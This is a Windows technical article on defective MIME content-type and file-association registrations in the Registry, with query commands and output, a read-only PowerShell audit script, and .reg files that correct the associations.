ICACLS.EXE "%ProgramData%\Microsoft\MF\*"
C:\ProgramData\Microsoft\MF\ACTIVE.GRL NT AUTHORITY\INTERACTIVE:(R,W)
    NT AUTHORITY\SYSTEM:(R,W)
    BUILTIN\Administrators:(R,W,WDAC)
    NT AUTHORITY\LOCAL SERVICE:(R,W)
    NT SERVICE\TrustedInstaller:(F)
C:\ProgramData\Microsoft\MF\PENDING.GRL NT AUTHORITY\INTERACTIVE:(R,W)
    NT AUTHORITY\SYSTEM:(R,W)
    BUILTIN\Administrators:(R,W,WDAC)
    NT AUTHORITY\LOCAL SERVICE:(R,W)
    NT SERVICE\TrustedInstaller:(F)
Successfully processed 1 files; Failed processing 0 files
Chinese Whispers is known as Telephone – in German-speaking countries it is called Stille Post.
application/msword for .doc and .dot,
application/rtf for .rtf,
application/vnd.microsoft.portable-executable for .exe and .dll etc.,
application/vnd.microsoft.windows.thumbnail-cache for thumbs.db,
application/vnd.ms-artgalry for .cil,
application/vnd.ms-asf for .asf,
application/vnd.ms-cab-compressed for .cab,
application/vnd.ms-3mfdocument for .3mf,
application/vnd.ms-excel for .xls and .xlt,
application/vnd.ms-excel.addin.macroEnabled.12 for .xlam,
application/vnd.ms-excel.sheet.binary.macroEnabled.12 for .xlsb,
application/vnd.ms-excel.sheet.macroEnabled.12 for .xlsm,
application/vnd.ms-excel.template.macroEnabled.12 for .xltm,
application/vnd.ms-fontobject for .eot,
application/vnd.ms-htmlhelp for .chm,
application/vnd.ms-ims for .ims,
application/vnd.ms-officetheme for .thmx,
application/vnd.ms-powerpoint for .pps and .ppt,
application/vnd.ms-powerpoint.addin.macroEnabled.12 for .ppam,
application/vnd.ms-powerpoint.presentation.macroEnabled.12 for .pptm,
application/vnd.ms-powerpoint.slide.macroEnabled.12 for .sldm,
application/vnd.ms-powerpoint.slideshow.macroEnabled.12 for .ppsm,
application/vnd.ms-powerpoint.template.macroEnabled.12 for .potm,
application/vnd.ms-project for .mpp,
application/vnd.ms-tnef for winmail.dat,
application/vnd.ms-word.document.macroEnabled.12 for .docm,
application/vnd.ms-word.template.macroEnabled.12 for .dotm,
application/vnd.ms-wpl for .wpl,
application/vnd.ms-xpsdocument for .xps,
audio/vnd.ms-playready.media.pya for .pya,
image/vnd.microsoft.icon for .ico,
image/vnd.ms-modi for .mdi,
text/vnd.ms-mediapackage for .mpf and
video/vnd.ms-playready.media.pyv for .pyv.
MIME content types alias media types for file extensions have had to be registered since Windows NT 3.1 and Windows 95 with the following pair of Registry entries:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.‹extension›]
"Content Type"="‹MIME type›"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\‹MIME type›]
"Extension"=".‹extension›"
Start the Command Processor Cmd.exe, then display the MIME content types registered with the 42 file extensions for which Microsoft has a MIME content type assigned by IANA:
FOR %? IN (.doc .dot .rtf .scr .exe .dll .cpl .ocx .mui .drv .sys .cil .asf .cab
.3mf .xls .xlt .xlam .xlsb .xlsm .xltm .eot .chm .ims .thmx .pps .ppt .ppam
.pptm .sldm .ppsm .potm .mpp .docm .dotm .wpl .xps .pya .ico .mdi .mpf .pyv) DO @(
REG.EXE QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\%? /V "Content Type") 2>NUL:
Note: the command lines can be copied and pasted as block into a Command Processor window.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe
Content Type REG_SZ application/x-msdownload
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.dll
Content Type REG_SZ application/x-msdownload
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asf
Content Type REG_SZ video/x-ms-asf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wpl
Content Type REG_SZ application/vnd.ms-wpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xps
Content Type REG_SZ application/vnd.ms-xpsdocument
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ico
Content Type REG_SZ image/x-icon
OUCH¹: only 6 of these 42 file extensions are registered with their MIME content type – and the 4 highlighted ones (those with an x- prefix) are not assigned by IANA!
Display the file extensions registered with the MIME content types which Microsoft has assigned by IANA:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword" /V "Extension"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/rtf" /V "Extension"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type" /F "vnd.microsoft" /K /S /V "Extension"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type" /F "vnd.ms-" /K /S /V "Extension"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword
Extension REG_SZ .doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/rtf
Extension REG_SZ .rtf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.certstore
Extension REG_SZ .sst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.pko
Extension REG_SZ .pko
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.seccat
Extension REG_SZ .cat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-wpl
Extension REG_SZ .wpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/vnd.ms-dds
Extension REG_SZ .dds
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/vnd.ms-photo
Extension REG_SZ .wdp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.certstore
Extension REG_SZ .sst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.pko
Extension REG_SZ .pko
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.seccat
Extension REG_SZ .cat
OUCH²: the MIME content type application/vnd.ms-xpsdocument for the file extension .xps is missing!
OUCH³: the 5 MIME content types application/vnd.ms-pki.* and image/vnd.ms-* are not assigned by IANA!
OUCH⁴: the 3 MIME content types vnd.ms-pki.* are invalid – their top-level media type is missing!
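As an added example (not part of the original page), the following PowerShell script audits the whole pair of Registry entries described above instead of the 42 hand-picked extensions: for every Classes\.‹extension› carrying a "Content Type" it checks that the MIME database has the reverse entry, and for every MIME database entry it checks the media type syntax and that its "Extension" points back. It reports the same classes of defect as the OUCH notes (missing reverse entry, missing top-level type, x- types); whether a syntactically valid vnd.* type is actually assigned by IANA cannot be decided offline. The list of top-level types is the one from the IANA media types registry.

```powershell
# Added example: read-only consistency audit of the two-way MIME registration.
# The .NET Registry API is used instead of the HKLM: provider because the
# provider treats the '/' in "application/msword" as a path separator.

# Top-level media types currently listed in the IANA media types registry.
$TopLevelTypes = @('application', 'audio', 'example', 'font', 'haptics', 'image',
                   'message', 'model', 'multipart', 'text', 'video')

function Test-MimeTypeSyntax {
    param([Parameter(Mandatory)][string]$Type)
    # A media type is <top-level>/<subtype>; "vnd.ms-pki.pko" has no '/' at all.
    if ($Type -notmatch '^([^/\s]+)/[^/\s]+$') { return 'NoTopLevelType' }
    if ($TopLevelTypes -notcontains $Matches[1].ToLowerInvariant()) { return 'UnknownTopLevelType' }
    # "x-" subtypes such as application/x-msdownload or image/x-icon are unregistered by definition.
    if ($Type -match '/x-') { return 'UnregisteredXPrefix' }
    return 'OK'
}

function Get-MimeRegistrationFindings {
    $hklm    = [Microsoft.Win32.Registry]::LocalMachine
    $classes = $hklm.OpenSubKey('SOFTWARE\Classes')
    $mimeDb  = $hklm.OpenSubKey('SOFTWARE\Classes\MIME\Database\Content Type')

    # Forward direction: Classes\.<ext> "Content Type" must have a MIME database entry.
    foreach ($ext in $classes.GetSubKeyNames()) {
        if ($ext -notlike '.*') { continue }
        $extKey = $classes.OpenSubKey($ext)
        if (-not $extKey) { continue }
        $type = [string]$extKey.GetValue('Content Type')
        if (-not $type) { continue }
        $syntax = Test-MimeTypeSyntax -Type $type
        if ($syntax -ne 'OK') {
            [pscustomobject]@{ Key = "Classes\$ext"; Value = $type; Finding = $syntax }
        }
        if (-not $mimeDb.OpenSubKey($type)) {
            [pscustomobject]@{ Key = "Classes\$ext"; Value = $type; Finding = 'NoMimeDatabaseEntry' }
        }
    }

    # Reverse direction: the MIME database entry's "Extension" must point back to the same type.
    foreach ($type in $mimeDb.GetSubKeyNames()) {
        $syntax = Test-MimeTypeSyntax -Type $type
        if ($syntax -ne 'OK') {
            [pscustomobject]@{ Key = "MIME\Database\Content Type\$type"; Value = ''; Finding = $syntax }
        }
        $ext = [string]$mimeDb.OpenSubKey($type).GetValue('Extension')
        if (-not $ext) {
            [pscustomobject]@{ Key = "MIME\Database\Content Type\$type"; Value = ''; Finding = 'NoExtension' }
            continue
        }
        $extKey  = $classes.OpenSubKey($ext)
        $forward = if ($extKey) { [string]$extKey.GetValue('Content Type') } else { '' }
        # Registry key names are case-insensitive, and so is PowerShell's -ne.
        if ($forward -ne $type) {
            [pscustomobject]@{ Key     = "MIME\Database\Content Type\$type"
                               Value   = $ext
                               Finding = "Asymmetric (Classes\$ext has Content Type '$forward')" }
        }
    }
}

Get-MimeRegistrationFindings | Sort-Object Finding, Key | Format-Table -AutoSize -Wrap
```

Several extensions may legitimately share one type (.doc and .dot both map to application/msword), so a shared type is only reported when the extension it names does not map back to it.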
Create the text file whisper.reg with the following content in an arbitrary, preferably empty directory:
REGEDIT4
; Copyright © 2004-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\.cab]
"Content Type"="application/vnd.ms-cab-compressed"
[HKEY_CLASSES_ROOT\.chm]
"Content Type"="application/vnd.ms-htmlhelp"
[HKEY_CLASSES_ROOT\.com]
"Content Type"="application/x-msdos-program"
[HKEY_CLASSES_ROOT\.cpl]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.dll]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.eot]
"Content Type"="application/vnd.ms-fontobject"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.exe]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.gz]
"Content Type"="application/gzip"
[HKEY_CLASSES_ROOT\.ico]
"Content Type"="image/vnd.microsoft.icon"
[HKEY_CLASSES_ROOT\.iso]
"Content Type"="application/x-iso9660-image"
"PerceivedType"="Application"
[HKEY_CLASSES_ROOT\.manifest]
"Content Type"="application/x-ms-manifest"
[HKEY_CLASSES_ROOT\.msi]
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.msm]
;@="MSI.MergeModule"
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.msp]
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.mst]
;@="MSI.Transform"
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.ocx]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.rdp]
"Content Type"="application/x-rdp"
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\.scr]
"Content Type"="application/vnd.microsoft.portable-executable"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.sys]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.udf]
"Content Type"="application/x-iso13346-image"
"PerceivedType"="Application"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/gzip]
"Extension"=".gz"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/sql]
"Extension"=".sql"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.microsoft.icon]
"Extension"=".ico"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.microsoft.portable-executable]
"Extension"=".exe"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-cab-compressed]
"Extension"=".cab"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-fontobject]
"Extension"=".eot"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-htmlhelp]
"Extension"=".chm"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-iso13346-image]
"Extension"=".udf"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-iso9660-image]
"Extension"=".iso"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-manifest]
"Extension"=".manifest"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-msdos-program]
"Extension"=".com"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ns-proxy-autoconfig]
"Extension"=".pac"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ole-storage]
"Extension"=".msi"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-rdp]
"Extension"=".rdp"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/zip]
"Extension"=".zip"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/comma-separated-values]
"Extension"=".csv"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/csv]
"Extension"=".csv"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/markdown]
"Extension"=".md"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/tab-separated-values]
"Extension"=".tsv"
Double-click the file whisper.reg created in step 1. to merge its entries into the Registry.
But they didn't bother to register most of the file extensions supported by their own system applications!
Create the text file whisper.reg with the following content in an arbitrary, preferably empty directory:
REGEDIT4
; Copyright © 2004-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\OpenWithList\Cmd.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Open\Command]
@="C:\\Windows\\System32\\Cmd.exe /D /K Call \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\OpenWithList\HH.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\Shell\Open\Command]
@="C:\\Windows\\HH.exe \"%L\""
; BUG: 'HH.exe -Decompile' fails with (properly) quoted file/pathname!
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\Shell\Extract\Command]
@="C:\\Windows\\HH.exe -Decompile . %1"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\OpenWithList\Cmd.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Open\Command]
@="C:\\Windows\\System32\\Cmd.exe /D /K Call \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.com\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\OpenWithList\Control.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\Shell\CplOpen\Command]
@="C:\\Windows\\System32\\Control.exe \"%L\",%*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\Shell\RunAs\Command]
@="C:\\Windows\\System32\\RunDLL32.exe C:\\Windows\\System32\\Shell32.dll,Control_RunDLLAsUser \"%L\",%*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.exe\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\OpenWithList\MSHTA.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Open\Command]
@="C:\\Windows\\System32\\MSHTA.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\OpenWithList\InfDefaultInstall.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Install\Command]
@="C:\\Windows\\System32\\InfDefaultInstall.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.log]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\OpenWithList\MMC.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\Author\Command]
@="C:\\Windows\\System32\\MMC.exe /A \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\Open\Command]
@="C:\\Windows\\System32\\MMC.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MMC.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\OpenWithList\MSIExec.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\Extract\Command]
@="C:\\Windows\\System32\\MSIExec.exe /A \"%L\" TARGETDIR=\"%W\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\Open\Command]
@="C:\\Windows\\System32\\MSIExec.exe /I \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MSIExec.exe /I \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\OpenWithList\MSIExec.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\Shell\Open\Command]
@="C:\\Windows\\System32\\MSIExec.exe /P \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MSIExec.exe /P \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msu\OpenWithList\WUSA.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msu\Shell\Open\Command]
@="C:\\Windows\\System32\\WUSA.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\OpenWithList\PowerShell.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\Shell\Open\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.psc1\OpenWithList\PowerShell.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.psc1\Shell\Open\Command]
@="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -p \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\OpenWithList\MSTSC.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Connect\Command]
@="C:\\Windows\\System32\\MSTSC.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Edit\Command]
@="C:\\Windows\\System32\\MSTSC.exe -Edit \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\OpenWithList\RegEdit.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Open\Command]
@="C:\\Windows\\RegEdit.exe /M \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scp]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Config]
@="C&onfigure"
"MUIVerb"="@C:\\Windows\\System32\\Shell32.dll,-10209"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Config\Command]
@="\"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Install]
@="&Install"
"MUIVerb"="@C:\\Windows\\System32\\Shell32.dll,-10210"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Install\Command]
@="\"C:\\Windows\\System32\\RunDLL32.exe\" \"C:\\Windows\\System32\\Desk.cpl\",InstallScreenSaver \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sct]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\OpenWithList\IExpress.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Open\Command]
@="C:\\Windows\\System32\\IExpress.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wtx]
"PerceivedType"="Text"
Double-click the file whisper.reg created in step 1. to merge its entries into the Registry.
With Windows Vista Microsoft enhanced the Default Programs control panel applet to manage associations for the individual file extensions supported by an application.
But they didn't bother to enable this shiny new feature for numerous standard applications like the Command Processor, Editor, IExpress Wizard, INF Default Installer, HTML Application Host, HTML Help Viewer, Microsoft Management Console, PowerShell, Registry Editor, Terminal Server Client, Windows Installer, Windows Script Host, Windows Update Standalone Installer and WordPad, which have shipped and been installed with Windows for more than 10 years since then.
Create the text file whisper.reg with the following content in an arbitrary, preferably empty directory:
REGEDIT4
; Copyright © 1999-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\.ddf]
@="ddffile"
"Content Type"="text/plain"
"PerceivedType"="text"
[HKEY_CLASSES_ROOT\ddffile]
@="Diamond Directives File"
[HKEY_CLASSES_ROOT\ddffile\Shell\Edit]
;@="&Edit"
[HKEY_CLASSES_ROOT\ddffile\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\.sed]
@="sedfile"
"Content Type"="text/plain"
"PerceivedType"="text"
[HKEY_CLASSES_ROOT\.sed\OpenWithList\IExpress.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithList\WordPad.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithProgIDs]
"WordPad.Document.1"=hex(0):
[HKEY_CLASSES_ROOT\.sed\PersistentHandler]
@="{5E941D80-BF96-11CD-B579-08002B30BFEB}"
[HKEY_CLASSES_ROOT\.sed\ShellNew]
"Command"="C:\\Windows\\System32\\IExpress.exe \"%L\""
[HKEY_CLASSES_ROOT\sedfile]
@="Self Extractor Directives"
[HKEY_CLASSES_ROOT\sedfile\Shell\Edit]
;@="&Edit"
[HKEY_CLASSES_ROOT\sedfile\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
; BUG: 'IExpress.exe' fails with (properly) quoted file/pathname!
[HKEY_CLASSES_ROOT\sedfile\Shell\Open\Command]
@="C:\\Windows\\System32\\IExpress.exe %1"
[HKEY_CLASSES_ROOT\sedfile\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\Capabilities]
"ApplicationDescription"="Command Processor"
"ApplicationName"="Command Processor"
